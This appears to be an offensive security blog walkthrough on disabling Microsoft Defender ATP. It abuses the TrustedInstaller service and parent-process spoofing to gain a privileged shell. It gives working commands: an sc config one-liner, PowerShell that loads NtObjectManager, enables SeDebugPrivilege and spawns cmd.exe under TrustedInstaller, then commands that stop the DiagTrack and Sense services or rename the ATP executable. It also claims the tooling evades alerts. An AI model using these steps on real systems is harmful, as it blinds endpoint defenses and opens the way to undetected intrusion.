Trusted Installer

MsSense is a PPL service, meaning that even with SYSTEM privileges, we will not be able to stop this.

However Microsoft allows "trusted callers" to manage protected services and other critical resources in the system. This "trusted caller" is a service called TrustedInstaller.

You may have seen this certain service while looking at ACLs of certain applications:

As you can see, it is given full control of calc.exe, and is the only service that has full control.

It is also given full control over all the SVCHOST, which hosts the diagtrack service binary.

The TrustedInstaller service is also a service which does not have PPL configured:

So does that mean we can just change Trustedinstaller’s binary path to stop the ATP Sense service?

sc config TrustedInstaller binPath= "cmd /C sc stop sense" && sc start TrustedInstaller

Well, you can't, since this is already a known technique that ATP is aware of, and will make an alert if you try to do this.

Alright, so we know that TrustedInstaller is a service configured without PPL, we could potentially spawn a cmd prompt with DiagTrack as its parent(cmd will inherit the TrustedInstaller's security token descriptor), and use that cmd prompt to disable the ATP service that way.

Information of why this works is in this picture:

To do this, we need the SeDebug privilege(which you can enable if you are admin).

We will use PowerShell, and two .NET DLLs from James forshaw which will ease the whole process for us. These are called NtObjectManager.dll and NtApiDoNet.dll.

You can find these DLLs here:

GitHub - googleprojectzero/sandbox-attacksurface-analysis-tools: Set of tools to analyze Windows sandboxes for exposed attack surface.GitHub

These DLLs will not trigger any alerts due to the fact that they are legitimate windows code and are just wrappers around low-level code.

We will first load those 2 dlls in memory:

$a = [System.Reflection.Assembly]::Load($NtObject.dll)
$b = [System.Reflection.Assembly]::Load($NtApi.dll)

We will then import the loaded assemblies:

Import-module $a
Import-module $b

We will then enable the SeDebug privilege:

$token = Get-NtToken -Primary
$token.SetPrivilege([NtApiDotNet.TokenPrivilegeValue[]]"SeDebugPrivilege", [NtApiDotNet.PrivilegeAttributes]"Enabled")

And then launch the TrustedInstaller process and get a handle to it:

start-service trustedinstaller
$handle = Get-NtProcess -Name "TrustedInstaller.exe"

We will then call the CreateProcess method to launch cmd.exe with TrustedInstaller.exe as its parent process.

$config = New-Object NtApiDotNet.Win32.Win32ProcessConfig
$config.CommandLine = "cmd"
$config.CreationFlags = [NtApiDotNet.Win32.CreateProcessFlags]16
$config.ParentProcess = $handle
[NtApiDotNet.Win32.Win32Process]::CreateProcess($config)

Then our CMD will popup!

From there, we can just stop the MsSense and Diagtrack service

C:\Windows\System32> Sc config diagtrack binpath="ploopy"
C:\Windows\System32> Sc stop diagtrack

Or just rename the executable:

rename "C:\Program Files\Windows Defender Advanced Thread Protection\SenseCncProxy.exe" blah 

This will effectively stop the ATP process.